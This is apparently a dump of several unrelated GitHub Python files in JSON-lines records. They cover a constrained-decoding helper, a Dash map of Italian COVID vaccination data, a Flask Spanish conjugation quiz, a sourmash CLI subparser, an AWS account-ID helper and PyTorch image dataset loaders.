keyword_codes['wselect'] = encode_fn(\"{}\".format('select'))[1]\n\n def prefix_allowed_tokens_fn(batch_id, sent):\n sent = sent.tolist()\n trie_out = get_trie_schema(sent)\n return trie_out\n\n def get_trie_schema(sent):\n pointer_start = get_keyword_mention(sent)\n keyword_rnt = list(keyword_codes.values())\n\n if pointer_start + 1 < len(sent) and pointer_start != -1:\n ment_next = mention_trie.get(sent[pointer_start + 1:])\n if codes[\"EOS\"] in ment_next:\n return ment_next + keyword_rnt\n else:\n return ment_next\n else:\n ment_next = 
mention_trie.get([])\n return ment_next + keyword_rnt + [codes[\"EOS\"]]\n\n def get_keyword_mention(sent):\n pointer_start = -1\n for i, e in enumerate(sent):\n if e in keyword_codes.values():\n pointer_start = i\n return pointer_start\n\n return prefix_allowed_tokens_fn\n","repo_name":"microsoft/ContextualSP","sub_path":"unified_parser_text_to_sql/genre/entity_linking.py","file_name":"entity_linking.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"}
+{"seq_id":"9839127406","text":"# resources\n# https://github.com/italia/covid19-opendata-vaccini\n# https://github.com/openpolis/geojson-italy\n\n# load libs\nfrom dash.dependencies import Input, Output, State\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport geopandas as gpd\nimport pandas as pd\n#import numpy as np\nfrom numerize.numerize import numerize\nimport dash, sys, json, requests\n\n# load geojson\nitaly_regions_url = \"https://raw.githubusercontent.com/openpolis/geojson-italy/master/geojson/limits_IT_regions.geojson\"\nitaly_geojson = requests.get(italy_regions_url).json()\nfor region in italy_geojson['features']:\n region[\"properties\"]['codice_regione_ISTAT'] = region[\"properties\"]['reg_istat_code_num']\nitaly_regions = gpd.GeoDataFrame.from_features(italy_geojson[\"features\"])\n\n# load data\nvaccine_data_url = \"https://raw.githubusercontent.com/italia/covid19-opendata-vaccini/master/dati/somministrazioni-vaccini-summary-latest.csv\"\ndf = pd.read_csv(vaccine_data_url)\nlasDate = df['data_somministrazione'].max()\ndf = df.groupby(['codice_regione_ISTAT', 'nome_area'], as_index=False)[['totale', 'sesso_maschile', 'sesso_femminile', 'prima_dose', 'seconda_dose']].agg('sum')\n\n# get the Italian population and merge it into df\npi = pd.read_csv(\"data/italian_population.csv\")\nfor type in ['totale', 'maschi', 'femmine']:\n tmp = pi.loc[pi['sesso'].values==type].copy()\n tmp.drop('sesso', axis='columns', inplace=True)\n tmp = tmp.rename(columns={\"totale_abitanti\": f\"{type}_abitanti\"})\n df = df.merge(tmp, on=\"codice_regione_ISTAT\")\n\n# merge the data onto the map\ngeo_df = italy_regions.merge(df, on=\"codice_regione_ISTAT\").set_index(\"reg_name\")\n\n# generate density\ngeo_df[\"area\"] = round(geo_df.area * 10000, 0)\ngeo_df[\"densita\"] = round(geo_df.totale_abitanti/geo_df[\"area\"], 0)\nfor field, populationfield in [('totale', 'totale'), ('sesso_maschile', 'maschi'), ('sesso_femminile', 'femmine'), ('prima_dose', 'totale'), ('seconda_dose', 'totale')]:\n geo_df[f\"perc_vac_{field}\"] = round((100*geo_df[field])/geo_df[f\"{populationfield}_abitanti\"], 2)\n\n#geo_df[\"vctot_on_densita\"] = geo_df[\"totale\"]/geo_df[\"area\"]\n#geo_df[\"vctot_on_densita\"] = np.round(np.interp(geo_df[\"vctot_on_densita\"], (geo_df[\"vctot_on_densita\"].min(), geo_df[\"vctot_on_densita\"].max()), (0, 100)), 2)\n\nexternal_stylesheets = [\n { 'href': 'https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma-rtl.min.css', 'rel': 'stylesheet' },\n { 'href': 'https://cdn.jsdelivr.net/npm/bulma-divider@0.2.0/dist/css/bulma-divider.min.css', 'rel': 'stylesheet' },\n { 'href': 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css', 'rel': 'stylesheet' },\n { 'href': 'static/custom.css', 'rel': 'stylesheet' }\n]\n\napp = dash.Dash(\n __name__,\n external_stylesheets=external_stylesheets\n)\napp.title = \"Covid Vaccination Italy\"\n\nfield2show = [\n {'label': 
'Percentuale Vaccinati Totale', 'value': 'perc_vac_totale'},\n #{'label': 'Totale Vaccinati su Densità', 'value': 'vctot_on_densita'},\n {'label': 'Percentuale Vaccinati 1ᵃ dose', 'value': 'perc_vac_prima_dose'},\n {'label': 'Percentuale Vaccinati 2ᵃ dose', 'value': 'perc_vac_seconda_dose'},\n {'label': 'Percentuale Vaccinati Maschi', 'value': 'perc_vac_sesso_maschile'},\n {'label': 'Percentuale Vaccinati Femmine', 'value': 'perc_vac_sesso_femminile'},\n {'label': 'Totale', 'value': \"totale\"},\n {'label': 'Sesso Maschile', 'value': \"sesso_maschile\"},\n {'label': 'Sesso Femminile', 'value': \"sesso_femminile\"},\n {'label': 'Prima Dose', 'value': \"prima_dose\"},\n {'label': 'Seconda Dose', 'value': \"seconda_dose\"}\n]\n\napp.layout = html.Div([\n html.Div([], className=\"is-hidden\", id=\"hidden\"),\n html.Div([\n html.Div([\n html.H1([\"Covid Vaccination Italy\"], className=\"title is-1 has-text-centered\"),\n html.H1([\n \"Made with \",\n html.A([\"Geopandas\"], className=\"has-text-primary\", href=\"https://geopandas.org/index.html\", target=\"_blank\"),\n \" X \",\n html.A([\"Dash\"], className=\"has-text-info\", href=\"https://dash.plotly.com/introduction\", target=\"_blank\")\n ], className=\"subtitle is-1 has-text-centered\"),\n html.Div([\n html.Div([\n html.Div([\n html.Div([\n html.P([html.Span([html.I([], className=\"fas fa-clipboard-list\")], className=\"icon has-text-info\"), \" Selectors\"], className=\"is-size-4 mb-4\"),\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary\"), \" Field for Map 1\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.Dropdown(\n id = 'field2showMap1', clearable=False,\n options = field2show,\n value = field2show[0]['value']\n ),\n\n html.Br(),\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary-dark\"), \" Field for Map 2\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.Dropdown(\n id = 'field2showMap2', clearable=False,\n options = field2show,\n value = field2show[1]['value']\n ),\n\n html.Br(),\n html.P([html.Span([html.I([], className=\"fas fa-ruler\")], className=\"icon\"), \" Max Km square\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.RangeSlider(id = \"range_square_km\"),\n\n html.Br(),\n html.P([html.Span([html.I([], className=\"fas fa-users\")], className=\"icon\"), \" Max Density\"], className=\"is-size-6 has-text-grey-light has-text-left\"),\n dcc.RangeSlider(id = \"range_density\")\n ])\n ], className=\"column is-3\", style={\"position\": \"relative\"}),\n html.Div(className=\"is-divider-vertical px-3\"),\n html.Div([\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary\"), \" Map 1\"], className=\"is-size-4\"),\n dcc.Loading(\n type=\"circle\",\n children=html.Div([dcc.Graph(id=\"map1\")], style={\"minHeight\":\"300px\"})\n )\n ], className=\"column\"),\n html.Div(className=\"is-divider-vertical px-3\"),\n html.Div([\n html.P([html.Span([html.I([], className=\"fas fa-map\")], className=\"icon has-text-primary-dark\"), \" Map 2\"], className=\"is-size-4\"),\n dcc.Loading(\n type=\"circle\",\n children=html.Div([dcc.Graph(id=\"map2\")], style={\"minHeight\":\"300px\"})\n )\n ], className=\"column\")\n ], className=\"columns is-gapless\"),\n html.Div(className=\"is-divider my-3\"),\n html.Div([\n html.Div([\n html.P([html.Span([html.I([], className=icon)], className=\"icon\"), f\" \", label], className=\"is-size-7 has-text-grey-light\"),\n 
html.P([value], className=\"is-size-4 has-text-info has-text-weight-bold\", id=id)\n ], className=\"column\")\n for label, value, id, icon in [\n (u\"Min Km\\u00B2\", 0, \"display_min_square_km\", \"fas fa-ruler\"),\n (u\"Max Km\\u00B2\", 0, \"display_max_square_km\", \"fas fa-ruler\"),\n (u\"Min Ab/Km\\u00B2\", 0, \"display_min_density\", \"fas fa-users\"),\n (u\"Max Ab/Km\\u00B2\", 0, \"display_max_density\", \"fas fa-users\"),\n (\"Total vaccinated\", numerize(int(geo_df[\"totale\"].sum())), \"\", \"fas fa-syringe\"),\n (\"Percent Vaccinated\", f'{round((100*int(geo_df[\"totale\"].sum()))/int(geo_df[\"totale_abitanti\"].sum()), 2)}%', \"\", \"fas fa-percentage\"),\n (\"Last update\", lasDate, \"\", \"far fa-calendar-alt\")\n ]\n ], className=\"columns\")\n ], className=\"box\"),\n dcc.Markdown('''\n Example of code\n ```py\n import requests\n import pandas as pd\n import geopandas as gpd\n\n vaccine_data_url = \"https://raw.githubusercontent.com/italia/covid19-opendata-vaccini/master/dati/somministrazioni-vaccini-summary-latest.csv\"\n italy_regions_url = \"https://raw.githubusercontent.com/openpolis/geojson-italy/master/geojson/limits_IT_regions.geojson\"\n\n df = pd.read_csv(vaccine_data_url)\n df = df.groupby(['codice_regione_ISTAT'], as_index=False)[['totale', 'sesso_maschile', 'sesso_femminile']].agg('sum')\n\n italy_regions = requests.get(italy_regions_url).json()\n for region in italy_regions['features']:\n region[\"properties\"]['codice_regione_ISTAT'] = region[\"properties\"]['reg_istat_code_num']\n italy_regions = gpd.GeoDataFrame.from_features(italy_regions[\"features\"])\n\n geo_df = italy_regions.merge(df, on=\"codice_regione_ISTAT\").set_index(\"reg_name\")\n geo_df.plot(\"totale\")\n ```\n ''', className=\"has-text-left\")\n ], className=\"container has-text-centered maxWidth\")\n ], className=\"hero-body\"),\n html.Footer([\n html.P([\"Made by \", html.A([\"@forno96\"], href=\"https://github.com/forno96\", target=\"_blank\")], className=\"has-text-centered\"),\n html.Br(), html.Br(),\n html.Div([\n html.A([html.Span([html.I([], className=_[2])], className=\"icon\"), f\" {_[0]}\"], href=_[1], target=\"_blank\", className=\"column\")\n for _ in [\n (\"Css by Bulma\", \"https://bulma.io\", \"fab fa-css3-alt has-text-primary\"),\n (\"Icons by Font Awesome\", \"https://fontawesome.com/\", \"fab fa-font-awesome has-text-info\"),\n (\"Vaccine data\", \"https://github.com/italia/covid19-opendata-vaccini\", \"fas fa-syringe has-text-success\"),\n (\"Italy map\", \"https://github.com/openpolis/geojson-italy\", \"fas fa-map has-text-warning\"),\n (\"People data\", \"http://dati.istat.it/Index.aspx?DataSetCode=DCIS_POPRES1\", \"fas fa-users has-text-danger\")\n ]\n ], className=\"content has-text-centered columns is-centered\")\n ], className=\"footer\")\n], className=\"hero is-fullheight\")\n\n\n@app.callback(\n Output('range_square_km', 'marks'),\n Output('range_square_km', 'min'),\n Output('range_square_km', 'max'),\n Output('range_square_km', 'value'),\n Input('hidden', 'children')\n)\ndef loadRangeSquareKM(hidden):\n return loadSlider(\"area\", u\"Km\\u00B2\")\n@app.callback(\n Output('range_density', 'marks'),\n Output('range_density', 'min'),\n Output('range_density', 'max'),\n Output('range_density', 'value'),\n Input('hidden', 'children')\n)\ndef loadRangeDensity(hidden):\n return loadSlider(\"densita\", u\"Ab/Km\\u00B2\")\n\n@app.callback(\n Output('display_min_square_km', 'children'),\n Output('display_max_square_km', 'children'),\n Input('range_square_km', 'value'),\n 
prevent_initial_call=True\n)\ndef diplayOnGauge(maxSquareKm):\n return numerize(maxSquareKm[0]), numerize(maxSquareKm[1])\n@app.callback(\n Output('display_min_density', 'children'),\n Output('display_max_density', 'children'),\n Input('range_density', 'value'),\n prevent_initial_call=True\n)\ndef diplayOnGauge(maxDensity):\n return numerize(maxDensity[0]), numerize(maxDensity[1])\n\n@app.callback(\n Output('map1', 'figure'),\n Input('field2showMap1', 'value'),\n Input('range_square_km', 'value'),\n Input('range_density', 'value'),\n State('field2showMap2', 'value'),\n prevent_initial_call=True\n)\ndef displayMap1(field, maxSquareKm, maxDensity, compareField):\n return diplayMap(field, maxSquareKm[0], maxSquareKm[1], maxDensity[0], maxDensity[1], compareField)\n@app.callback(\n Output('map2', 'figure'),\n Input('field2showMap2', 'value'),\n Input('range_square_km', 'value'),\n Input('range_density', 'value'),\n State('field2showMap1', 'value'),\n prevent_initial_call=True\n)\ndef displayMap2(field, maxSquareKm, maxDensity, compareField):\n return diplayMap(field, maxSquareKm[0], maxSquareKm[1], maxDensity[0], maxDensity[1], compareField)\n\n#/km^2\ndef loadSlider(field, measure):\n max = int(geo_df[field].max())\n min = int(geo_df[field].min())\n marks={\n min: f\"{numerize(min)} {measure}\",\n max: f\"{numerize(max)} {measure}\"\n }\n value=[min, max]\n return marks, min, max, value\n\ndef diplayMap(field, minSquareKm, maxSquareKm, minDensity, maxDensity, compareField):\n hover_data = list(set(['area', 'totale', 'densita', 'perc_vac_totale', field, compareField]))\n\n mask = (minSquareKm <= geo_df['area']) & (geo_df['area'] <= maxSquareKm) & (minDensity <= geo_df['densita']) & (geo_df['densita'] <= maxDensity)\n tmp = geo_df.loc[mask]\n\n fig = px.choropleth_mapbox(\n tmp,\n geojson=tmp.geometry,\n locations=tmp.index,\n hover_data=hover_data,\n color=field,\n color_continuous_scale=px.colors.sequential.GnBu,\n opacity=0.5,\n center={\"lat\": 41.8719, \"lon\": 12.5694}, zoom=4,\n mapbox_style=\"carto-positron\",\n labels={'area':'Area', 'densita':'Densità', 'perc_vac_totale': 'Percentuale vaccinati', 'perc_vac_sesso_maschile': 'Percentuale vac. maschi', 'perc_vac_sesso_femminile': 'Percentuale vac. 
femmine','reg_name': 'Regione', 'totale': 'Totale', 'prima_dose': 'Prima dose', 'seconda_dose': 'Seconda dose', 'sesso_maschile': 'Sesso maschile', 'sesso_femminile': 'Sesso femminile', 'categoria_operatori_sanitari_sociosanitari': 'Operatori sanitari', 'categoria_personale_non_sanitario': 'Personale non sanitario', 'categoria_ospiti_rsa': 'Ospiti rsa', 'categoria_personale_scolastico': 'Personale scolastico', 'categoria_60_69': '60/69', 'categoria_over80': 'Over 80', 'categoria_soggetti_fragili': 'Soggetti fragili', 'categoria_forze_armate': 'Forze armate', 'categoria_altro': 'Altro'}\n )\n fig.update_layout(margin=dict(b=0,t=40,l=0,r=0))\n\n return fig\n\nif __name__ == '__main__':\n app.run_server(host=\"0.0.0.0\", debug=True)\n","repo_name":"forno96/geopandasXdash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32426503176","text":"from flask import Flask, render_template, request, redirect, url_for\nimport random\nimport json\nimport conjugador\n\n#Import data from a .json file\nwith open(\"dados.json\", \"r\", encoding='utf-8') as a:\n DADOS_QUESTÕES = json.load(a)\n\nTIPOS_PERGUNTAS = [\"Completa la oración con la conjugación correcta del verbo\", \n\"¿Es correcta la conjugación del verbo en el presente del indicativo en esta oración?\"]\n\napp = Flask(__name__)\nrespCerta = \"\"\n\ndef reset():\n global questoesVistas, qAtual, acertos, dataQVistas\n questoesVistas = []\n qAtual = 0\n acertos = 0\n dataQVistas = [0, 0, 0, 0]\n\ndef novaQuestao(ovrd=-1):\n global questoesVistas, qAtual, dataQVistas, tipoQuestao\n if ovrd == -1:\n qAtual += 1\n\n q = 0\n while True: #Pick a new question that has not been seen yet\n q = random.randint(1, len(DADOS_QUESTÕES))\n if [q, False] not in questoesVistas and [q, True] not in questoesVistas:\n break\n else:\n q = ovrd\n \n if [q, False] not in questoesVistas and [q, True] not in questoesVistas:\n questoesVistas.append([q, False])\n tipoQuestao = DADOS_QUESTÕES[q-1][\"pergunta\"]\n\n if tipoQuestao == 0:\n if ovrd == -1:\n dataQVistas[1] += 1\n pergunta, frase, verbo, respCerta = DADOS_QUESTÕES[q-1].values()\n\n opcoes = conjugador.conjugacoes(DADOS_QUESTÕES[q-1]['verbo']) #Generate the conjugation options\n escolhidas = []\n ic = opcoes.index(respCerta)\n while len(escolhidas) < 4: #Pick random items from the verb's conjugations\n r = random.randint(0, len(opcoes)-1)\n if r not in escolhidas:\n escolhidas.append(r)\n if len(escolhidas) == 4 and ic not in escolhidas: #If the correct option was not picked, replace one of the items with it\n escolhidas[random.randint(0, 3)] = ic\n \n estado = []\n respCerta = \"ABCD\"[escolhidas.index(ic)]\n for i in \"ABCD\":\n if i == respCerta: #Update state for css purposes\n estado.append(\"certa\")\n else:\n estado.append(\"\")\n \n alts = []\n for i in escolhidas:\n alts.append(opcoes[i])\n return [pergunta, frase, verbo, alts, respCerta, estado]\n else:\n if ovrd == -1:\n dataQVistas[3] += 1\n alts = [\"Verdadero\", \"Falso\"]\n\n pergunta, frase, respCerta = DADOS_QUESTÕES[q-1].values()\n estado = []\n for i in alts:\n if i == respCerta:\n estado.append(\"certa\")\n else:\n estado.append(\"\")\n return [pergunta, frase, respCerta, estado]\n\ndef processarQuestao(questao):\n global respCerta, dataQVistas, qAtual\n acertos = dataQVistas[0] + dataQVistas[2]\n vistas = dataQVistas[1] + dataQVistas[3]\n print(dataQVistas)\n #Manage whether the forward and back buttons are enabled\n dis = [\"\", \"\"]\n if qAtual == 1:\n dis[0] = 'disabled'\n if qAtual >= vistas:\n dis[1] = 'disabled'\n \n #Receive the data and render the correct page according to the question type\n if questao[0] == 0:\n pergunta, frase, verbo, escolhidas, respCerta, estado = questao\n return render_template(\"telaquestao.html\", \n qAtual=qAtual, \n enunciado=f\"{TIPOS_PERGUNTAS[pergunta]} {verbo}: {frase}\", \n itens=escolhidas,\n estado=estado, \n acertos=acertos, \n roteador=roteador,\n disabled=dis\n )\n else:\n pergunta, frase, respCerta, estado = questao\n return render_template(\"telaquestao2.html\", \n qAtual=qAtual, \n enunciado=f'{TIPOS_PERGUNTAS[pergunta]}',\n frase= frase,\n estado=estado,\n acertos=acertos, \n roteador=roteador,\n disabled=dis\n )\n\ndef roteador(tela):\n return url_for(f'{tela}')\n\n@app.route('/')\ndef home():\n return redirect('/inicio') #Redirect the empty path to the start page\n\n@app.route('/inicio', methods =[\"GET\", \"POST\"])\ndef inicio():\n reset()\n return render_template(\"inicio.html\", roteador=roteador)\n\n@app.route('/explicacao', methods =[\"GET\", \"POST\"])\ndef explicacao():\n return render_template(\"explicacao.html\", roteador=roteador)\n\n@app.route('/resultados', methods =[\"GET\", \"POST\"])\ndef resultados():\n global dataQVistas\n return render_template(\"resultados.html\", roteador=roteador, completar=dataQVistas[0:2], verdFalso=dataQVistas[2:4])\n\n@app.route('/questao', methods =[\"GET\", \"POST\"])\ndef questao():\n global tipoQuestao, dataQVistas, qAtual\n\n if 'questoesVistas' not in globals():\n reset()\n\n if len(questoesVistas) == 15:\n return redirect('resultados')\n \n if request.method == \"GET\":\n if len(questoesVistas) == 0:\n questao = novaQuestao()\n return processarQuestao(questao)\n \n if request.method == \"POST\":\n formRes = []\n if request.form.keys():\n formRes = list(request.form.keys())[0]\n \n if formRes in [\"vquestao\", \"aquestao\"]: #Navigating through the questions\n if formRes == \"vquestao\":\n if qAtual > 1:\n qAtual -= 1\n else:\n if qAtual < len(questoesVistas):\n qAtual += 1\n questao = novaQuestao(ovrd=questoesVistas[qAtual-1][0])\n else:\n if formRes != \"botaoproximo\" or qAtual == 0:\n if formRes == respCerta:\n dataQVistas[tipoQuestao*2] += 1\n questao = novaQuestao()\n\n if 'questao' not in locals():\n qAtual = len(questoesVistas)\n questao = novaQuestao(ovrd=questoesVistas[-1][0])\n return processarQuestao(questao)\n \n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\")","repo_name":"Maruquitus/Trabalho-de-Espanhol","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"26485199701","text":"\"\"\"downsample one or more signatures\"\"\"\n\nimport sys\n\nfrom sourmash.cli.utils import add_moltype_args, add_ksize_arg\n\n\ndef subparser(subparsers):\n subparser = subparsers.add_parser('downsample')\n subparser.add_argument('signatures', nargs=\"+\")\n subparser.add_argument(\n '--scaled', type=int, default=0,\n help='scaled value to downsample to'\n )\n subparser.add_argument(\n '--num', metavar='N', type=int, default=0,\n help='num value to downsample to'\n )\n subparser.add_argument(\n '-q', '--quiet', action='store_true',\n help='suppress non-error output'\n )\n subparser.add_argument(\n '-o', '--output', metavar='FILE',\n help='output signature to this file (default stdout)'\n )\n add_ksize_arg(subparser, 
31)\n add_moltype_args(subparser)\n\n\ndef main(args):\n import sourmash\n return sourmash.sig.__main__.downsample(args)\n","repo_name":"Domedriver/sourmash","sub_path":"src/sourmash/cli/sig/downsample.py","file_name":"downsample.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"2781336745","text":"\"\"\"Metadata about the account.\"\"\"\n\nimport os\nfrom typing import Optional\n\ntry:\n import boto3\nexcept ImportError as err:\n raise ImportError(\n f\"Error: boto3 not installed, install extra 'pip install boto3 to read AWS account attributes. \\n{str(err)}\"\n ) from err\n\n\ndef get_aws_account_id() -> str:\n \"\"\"Get AWS account ID.\"\"\"\n aws_profile: Optional[str] = os.getenv(\"AWS_PROFILE\")\n\n if aws_profile:\n print(f\"Using AWS_PROFILE value from environment: {aws_profile}.\")\n else:\n print(\n \"Warning: AWS_PROFILE environment variable not set. Setting --profile has no effect. AWS access keys or RBAC will be used instead.\"\n )\n\n session = boto3.Session(profile_name=aws_profile)\n return session.client(\"sts\").get_caller_identity()[\"Account\"]\n","repo_name":"mlops-club/awscdk-clearml","sub_path":"src/cdk_clearml/utils/aws_account_info.py","file_name":"aws_account_info.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74718114611","text":"\n\nclass WallMask(object):\n def __init__(self):\n self.tilesize = 20\n self.wallmask = set()\n\n def add(self,sprite): #only if apropiate\n padding = 1\n a = sprite.rotation%360\n if abs(a-90) < 45 or abs(a-270) < 45:\n w = sprite.height\n h = sprite.width\n else:\n w = sprite.width\n h = sprite.height\n sx = (sprite.x - w/2)/self.tilesize - padding\n sy = (sprite.y - h/2)/self.tilesize - padding\n for x in range(w/self.tilesize+1 + padding*2):\n for y in range(h/self.tilesize+1 + padding*2):\n key = int(sx+x),int(sy+y)\n self.wallmask.add(key)\n\n\n def is_empty(self,x,y):\n key = (int(x/self.tilesize),int(y/self.tilesize))\n result = not key in self.wallmask\n return result\n","repo_name":"luciotorre/aiamsori","sub_path":"gamelib/wallmask.py","file_name":"wallmask.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25291232362","text":"import json\n\nclass Store:\n\n def __init__(self):\n self.data = {}\n\n def set(self, key, value):\n self.data[key] = value\n\n def get(self, key):\n keys = key.split('.')\n result = self.data\n for k in keys:\n result = result.get(k)\n return result\n\n def update(self, key, value):\n keys = key.split('.')\n temp = self.data\n for k in keys[:-1]:\n temp = temp.get(k)\n temp[keys[-1]] = value\n\n def delete(self, key):\n keys = key.split('.')\n temp = self.data\n for k in keys[:-1]:\n temp = temp.get(k)\n del temp[keys[-1]]\n\nstore = Store()\nstore.set('user.name', 'John')\nprint(store.get('user.name'))\n\nstore.update('user.name', 'Jane')\nprint(store.get('user.name'))\n\nstore.delete('user.name')\nprint(store.get('user'))","repo_name":"spamulodd/lab2","sub_path":"60 задание.py","file_name":"60 задание.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18207902926","text":"from skimage import io, transform, img_as_float\nimport pandas as pd\nimport numpy as np\nimport json\nimport os\n\nimport 
torch\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\nclass ImageNet(Dataset):\n def __init__(self, file, min_class_id, max_class_id, transform, idx = -1):\n self.file = pd.read_csv(file)\n self.data = self.file.iloc[:, :]\n self.data = np.array(self.data)\n self.data = self.data[np.where(self.data[:,2] >= min_class_id)]\n self.data = self.data[np.where(self.data[:,2] <= max_class_id)]\n self.transform = transform\n self.image_idx = idx\n\n def __len__(self):\n return self.data.shape[0]\n\n def __getitem__(self, idx):\n if int(self.image_idx) !=-1:\n idx = int(self.image_idx)\n row_idx = self.data[idx]\n img_path = row_idx[0]\n class_id = row_idx[2]\n\n X = img_as_float(io.imread(img_path, as_gray=False)).astype(np.float32)\n img_size = X.shape\n bboxes = []\n sample = {'image': X, 'bboxes': bboxes, 'labels': class_id, 'image_path': img_path}\n if self.transform:\n sample = self.transform(sample)\n sample['image_size'] = img_size\n return sample\n\n\nclass MSCOCO_Dataset(Dataset):\n \"\"\"MSCOCO dataset.\"\"\"\n\n def __init__(self, json_file, transform=None, idx = -1):\n \"\"\"\n Args:\n json_file (string): Path to the json file with annotations.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.annotations = pd.DataFrame.from_dict(json.load(open(json_file)), orient='index')\n self.annotations.reset_index(level=0, inplace=True)\n self.transform = transform\n self.image_idx = idx\n\n def __len__(self):\n return len(self.annotations)\n # return 1\n\n def __getitem__(self, idx, color=True):\n # idx = 0\n # print(idx)\n if int(self.image_idx) != -1:\n idx = int(self.image_idx)\n # print(idx)\n # idx = int(idx)\n # print(self.idx)\n img_name = self.annotations['image_path'][idx]\n # image = io.imread(img_name)\n img = img_as_float(io.imread(img_name, as_gray=not color)).astype(np.float32)\n img_size = img.shape\n if img.ndim == 2:\n img = img[:, :, np.newaxis]\n if color:\n img = np.tile(img, (1, 1, 3))\n elif img.shape[2] == 4:\n img = img[:, :, :3]\n bboxes = self.annotations['bbox_info'][idx]\n labels = self.annotations['classification_labels'][idx]\n sample = {'image': img, 'bboxes': bboxes, 'labels': labels, 'image_path': img_name}\n\n if self.transform:\n sample = self.transform(sample)\n\n sample = {'image': sample['image'], 'labels': sample['labels'], 'image_path':sample['image_path'], 'image_size': img_size, 'bboxes': sample['bboxes']}\n\n return sample\n\n def getSampleByImagePath(self, imgPath, color=True):\n record_from_json = self.annotations[self.annotations.image_path==imgPath]\n # from IPython.core.debugger import set_trace; set_trace()\n img_name = record_from_json.image_path.iloc[0] # record_from_json.image_path[0]\n # image = io.imread(img_name)\n img = img_as_float(io.imread(img_name, as_gray=not color)).astype(np.float32)\n if img.ndim == 2:\n img = img[:, :, np.newaxis]\n if color:\n img = np.tile(img, (1, 1, 3))\n elif img.shape[2] == 4:\n img = img[:, :, :3]\n bboxes = record_from_json.bbox_info.iloc[0]\n labels = record_from_json.classification_labels.iloc[0]\n sample = {'image': img, 'bboxes': bboxes, 'labels': labels, 'image_path': img_name}\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (tuple or int): Desired output size. If tuple, output is\n matched to output_size. 
If int, smaller of image edges is matched\n to output_size keeping aspect ratio the same.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image = sample['image']\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = transform.resize(image, (new_h, new_w), mode='reflect', anti_aliasing=False)\n\n bboxes = []\n \n if len(sample['bboxes']) != 0 :\n for annotation in sample['bboxes']:\n bbox = [0]*4\n bbox[0] = annotation['bbox'][0] * new_w / w\n bbox[1] = annotation['bbox'][1] * new_h / h\n bbox[2] = annotation['bbox'][2] * new_w / w\n bbox[3] = annotation['bbox'][3] * new_h / h\n\n # bboxes.append(bbox)\n bboxes.append({'bbox':bbox, 'category':annotation['category'], \\\n 'category_id':annotation['category_id'], 'class_id':annotation['class_id']})\n\n return {'image': img, 'bboxes': bboxes, 'labels': sample['labels'], 'image_path': sample['image_path']}\n\nclass ScaleIntensities(object):\n \"\"\"Convert image intensities to lie between 0 and 255.\"\"\"\n\n def __call__(self, sample, scale=255.0):\n image, labels = sample['image'], sample['labels']\n\n # Multiply the intensity values\n image = image*scale\n\n return {'image': image,\n 'labels': labels,\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\nclass MakeCHWformat(object):\n\n def __call__(self, sample):\n image, labels = sample['image'], sample['labels']\n\n # swap color axis because\n # numpy image: H x W x C\n # we need: C X H X W\n image = image.transpose((2, 0, 1))\n\n return {'image': image,\n 'labels': labels,\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\n\nclass RGBtoBGR(object):\n \"\"\"Convert image from RGB to BGR.\"\"\"\n\n def __call__(self, sample):\n image, labels = sample['image'], sample['labels']\n\n # swap RGB to BGR\n image = image[(2,1,0), :, :] # np.flip(image,axis=0).copy() # image[:,:,::-1]\n\n return {'image': image,\n 'labels': labels,\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n image, labels = sample['image'], sample['labels']\n\n\n\n return {'image': torch.from_numpy(image.astype(float)),\n 'labels': torch.from_numpy(np.asarray(labels)),\n 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\nclass Normalize(object):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels, this transform\n will normalize each channel of the input ``torch.*Tensor`` i.e.\n ``input[channel] = (input[channel] - mean[channel]) / std[channel]``\n Args:\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channel. 
